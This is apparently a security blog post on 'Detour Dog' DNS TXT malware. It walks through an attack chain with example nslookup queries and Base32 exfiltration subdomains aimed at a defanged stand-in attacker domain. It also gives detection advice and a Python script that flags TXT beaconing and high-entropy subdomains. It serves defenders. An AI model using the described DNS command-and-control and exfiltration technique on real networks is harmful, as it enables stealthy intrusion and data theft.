Cybercriminals are no longer just breaking in; they’re learning to blend in. A new, worrying type of malware called “Detour Dog” hides by using parts of the internet that people usually trust. Instead of using obvious methods, it stores and receives information through DNS TXT records — tiny pieces of text that are normally harmless. Detour Dog uses those records to scout targets, download its harmful software, and send and receive instructions from its operators. Because it operates through this trusted channel, it can avoid normal security alerts.
Unlike classic malware that downloads executables over HTTP, “Detour Dog” leverages DNS, a protocol so fundamental that it’s rarely scrutinized. This blog explains how it works, walks through a realistic attack scenario, and includes a safe, ethical demonstration to illustrate the technique.
Why DNS TXT Records Are a Perfect Cover

DNS TXT records were originally designed to hold free-form, human-readable notes about a domain, such as contact details or explanations. Over time they became the standard carrier for email authentication data used by SPF, DKIM and DMARC. Because they are so flexible and so often ignored by security tooling, TXT records have become an attractive vehicle for cybercriminals. Unlike web traffic (HTTP/HTTPS), DNS requests usually pass through firewalls with minimal inspection, so attackers can place malicious instructions or data in TXT records largely unnoticed by security solutions that focus on blocking suspicious websites or known malware.
Enter “Detour Dog”
First spotted in early 2025, Detour Dog represents the next stage in the evolution of stealth malware. Its infection typically starts with something ordinary: a phishing email or a compromised application.
After the victim executes the file, the malware refrains from downloading anything via HTTP. Rather, it carries out a DNS TXT query to a domain owned by the attacker. The text hidden in the response is not innocent information; it is an encoded script or payload.
The malware decodes that data directly in memory and executes it as a fileless attack technique that avoids writing anything to disk. From there, Detour Dog uses DNS TXT records for everything: receiving new commands, sending updates, and exfiltrating sensitive information, all disguised as normal DNS traffic.
This use of DNS for both payload delivery and command-and-control (C2) makes it extremely hard to detect. Many Endpoint Detection and Response (EDR) platforms, firewalls, and SIEMs aren’t tuned to monitor DNS behavior closely enough to spot this kind of abuse.
Example Scenario: How “Detour Dog” Infects a Corporate Workstation
Below is a clear, practical attack chain showing how Detour Dog-style malware would operate in a mid-sized financial firm that has a firewall, email filtering and EDR on endpoints but no DNS-layer security.
Step-by-Step Attack Flow:

- Initial Compromise:
  An employee opens a phishing Word document and enables macros. The macro runs automatically and drops a small program called loader.exe onto the machine.
- Loader Execution:
  loader.exe runs and performs a DNS TXT query to stage.malicious-c2[.]xyz.
- Payload Retrieval via TXT:
  The attacker’s DNS server responds with:
  “TVqQAAMAAAA…[Base64-encoded shellcode]…”
  The loader decodes this string from Base64, injects it into memory as reflective shellcode, and executes it, bypassing disk-based AV.
- Establishing C2:
  The in-memory payload now acts as a beacon. Every 60 seconds, it queries:
  nslookup -type=TXT cmd.malicious-c2[.]xyz
  The TXT response might be:
  “aWQ9MTIzO2NtZD1kYXRhX2V4ZmlsdHJhdGlvbg==”
  Decoded: id=123;cmd=data_exfiltration
- Data Exfiltration:
  The malware compresses sensitive files, encodes them in Base32, and sends them via subdomain queries:
  abcd1234.malicious-c2[.]xyz
  efgh5678.malicious-c2[.]xyz
  The attacker’s DNS server logs these queries and reconstructs the stolen data.
Throughout this process, no HTTP/S traffic leaves the network, and no suspicious files are written to disk. Traditional SIEM alerts remain silent.
Why This Matters
The consequences are huge:
- Evasion of typical security controls: Firewalls, proxies and many IDSs generally look only at the simplest DNS activity (resolving names to IPs) and rarely inspect the contents of DNS responses. Attackers can therefore embed instructions and data inside DNS records that these tools never examine.
- Continuity: DNS is an infrastructure service that remains available across reboots and network changes, so DNS-based command-and-control keeps working after a machine restarts. If the malware also uses DGAs (automatically generating large numbers of domain names) or fast-flux (rapidly rotating the IPs behind a domain), blocking or sinkholing it becomes far harder.
- Blending in: DNS traffic is ubiquitous in corporate networks. A few extra TXT queries or odd-looking names are easily taken for normal noise, so malicious DNS activity drowns in the sea of legitimate requests.
Historic incident
- In the campaign known as DNSMessenger, the threat actors staged a PowerShell loader through a macro-enabled Word document. To avoid detection, the infected machine did not download files over HTTP; instead it looked up TXT records on a DNS domain controlled by the attackers. The retrieved TXT records contained Base64-encoded command fragments that were concatenated and decoded, and the commands were then run locally, giving the attackers remote control and data exfiltration over DNS without the activity appearing in the usual traffic logs.
Ref: DNSMessenger PowerShell Malware Analysis
- The threat actor dubbed Detour Dog was observed in late 2025 distributing the infostealer Strela Stealer via a novel DNS-based channel. Compromised websites issued DNS TXT lookups to domains under Detour Dog control; the responses contained encoded instructions or download redirections. The campaign reportedly infected over 30,000 websites and leveraged TXT-based C2 and payload delivery to avoid detection.
Ref: Dangerous DNS malware infects over 30,000 websites – so be on your guard | TechRadar
How to Detect & Defend Against TXT-Based Malware
- Monitor DNS Anomalies
  - Frequent TXT queries from workstations
  - TXT responses >100 bytes from non-email domains
  - Unusual query timing (e.g., every 60 seconds)
- Deploy DNS-Layer Security
  Use services like:
  - Cisco Umbrella
  - Palo Alto DNS Security
  - Cloudflare Gateway
  These can block known malicious domains and flag abnormal TXT usage.
- Enable DNS Logging & Analytics
  Centralize DNS logs in your SIEM. Create alerts for:
  - TXT queries to newly registered domains
  - High entropy in subdomains (data exfiltration)
- Restrict Outbound DNS
  Force all internal clients to use your internal DNS resolver, and block direct external DNS (e.g., to 8.8.8.8).
- Harden Endpoints
  - Disable unnecessary PowerShell execution
  - Enable AMSI (Antimalware Scan Interface)
  - Use application allowlisting
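The monitoring rules above (frequent TXT queries, large TXT answers from non-email domains, fixed-interval timing, high-entropy subdomains) can be run over resolver logs; the following is an added example written for this post, not code from the original article or from any vendor. It assumes a simple space-separated log format and a constructed sample that mirrors the 60-second beacon and Base32 subdomain queries from the attack scenario; the domains, IPs and thresholds are invented.

```python
import math
import statistics
from collections import defaultdict
# Constructed resolver log (not real traffic), one query per line:
# epoch_seconds client_ip qname qtype answer_bytes
SAMPLE_LOG = """\
1000 10.0.0.5 _dmarc.example.com TXT 80
1000 10.0.0.7 cmd.bad-example.test TXT 44
1060 10.0.0.7 cmd.bad-example.test TXT 44
1120 10.0.0.7 cmd.bad-example.test TXT 44
1180 10.0.0.7 cmd.bad-example.test TXT 44
1181 10.0.0.7 stage.bad-example.test TXT 2048
1200 10.0.0.7 mfzxi3tpnfra2lzw.bad-example.test A 0
1201 10.0.0.7 gezdgnbvgy3tqojq.bad-example.test A 0
1300 10.0.0.9 www.example.com A 16
"""
# Assumed: the organisation's own mail domains, whose apex TXT (SPF) is legitimately large
ALLOWED_TXT_DOMAINS = {"example.com"}

def shannon_entropy(s):
    """Bits per character; random-looking Base32/Base64 labels score high (max 8)."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def is_email_txt(qname):
    """SPF/DKIM/DMARC lookups are the normal reason a workstation asks for TXT records."""
    labels = qname.split(".")
    return qname in ALLOWED_TXT_DOMAINS or "_dmarc" in labels or "_domainkey" in labels

def analyze(log_text, txt_limit=4, size_limit=100, max_jitter=2.0, entropy_limit=3.4):
    alerts, txt_count, timeline = defaultdict(list), defaultdict(int), defaultdict(list)
    for line in log_text.splitlines():
        ts, client, qname, qtype, size = line.split()
        ts, size = int(ts), int(size)
        if qtype == "TXT":
            txt_count[client] += 1
            timeline[(client, qname)].append(ts)
            if size > size_limit and not is_email_txt(qname):  # big TXT, not email auth
                alerts["large_txt_non_email"].append((client, qname, size))
        first = qname.split(".")[0]  # leftmost label is where exfil chunks are placed
        if len(first) >= 12 and shannon_entropy(first) > entropy_limit:
            alerts["high_entropy_label"].append((client, qname))
    for client, n in txt_count.items():  # workstations rarely need many TXT lookups
        if n >= txt_limit:
            alerts["frequent_txt"].append((client, n))
    for (client, qname), stamps in timeline.items():  # fixed-interval TXT = beacon
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= 2 and statistics.pstdev(gaps) <= max_jitter:
            alerts["beaconing"].append((client, qname, round(statistics.mean(gaps))))
    return dict(alerts)
```

Calling analyze(SAMPLE_LOG) flags 10.0.0.7 on all four rules while the DMARC lookup from 10.0.0.5 and the ordinary A query from 10.0.0.9 stay quiet; tune the thresholds against your own baseline before alerting on them.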
Conclusion
“Detour Dog” isn’t theoretical: it reflects a real-world trend in which attackers hide behind trusted infrastructure instead of exploiting obvious vulnerabilities. By embedding malicious code and communication inside DNS TXT records, adversaries gain stealth, persistence, and control with minimal risk of detection.
But this isn’t undefendable. With DNS-aware visibility, anomaly-based monitoring, and strict egress controls, defenders can uncover these hidden channels before data leaves the network.
The lesson? Trust nothing, even the protocols that keep the internet running. In cybersecurity, the quietest traffic is often the most dangerous.